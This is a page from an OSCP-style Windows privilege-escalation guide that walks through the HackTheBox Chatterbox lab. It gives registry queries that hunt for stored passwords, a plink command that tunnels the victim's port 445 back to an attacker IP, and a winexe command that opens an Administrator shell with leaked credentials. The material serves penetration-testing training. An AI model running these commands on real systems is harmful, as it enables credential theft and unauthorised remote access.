Stored Passwords and Port Forwarding

Overview

Credentials can be stored in the registry and some ports are on the machine are only accessible from the inside (itself).

What if the user we landed on is an Administrator but just needs to provide credentials to execute commands as system?

Registry Passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

Example output

HTB Machine Chatterbox

Port Forwarding

netstat -ano
HTB Machine Chatterbox

Plink is an SSH and Telnet client which will allow us to port forward on the machine

Upload and Run plink.exe to make it ssh into your machine via the forwarded local port 445, allowing you to access the local port 445.

plink.exe -l root -pw rootpasswd -R 445:127.0.0.1:445 10.10.14.10

You'll be in box inception inside of your attacker machine.

Use winexe to start a shell as Administrator over the port forward connection

winexe -U Administrator%Welcome1 //127.0.0.1 cmd.exe

If there's a credential being leaked in a CTF environment chances are it leads to something else so don't disregard it

LogoPrivilege Escalation - Windows · Total OSCP Guide
PreviousxamppNextRunAs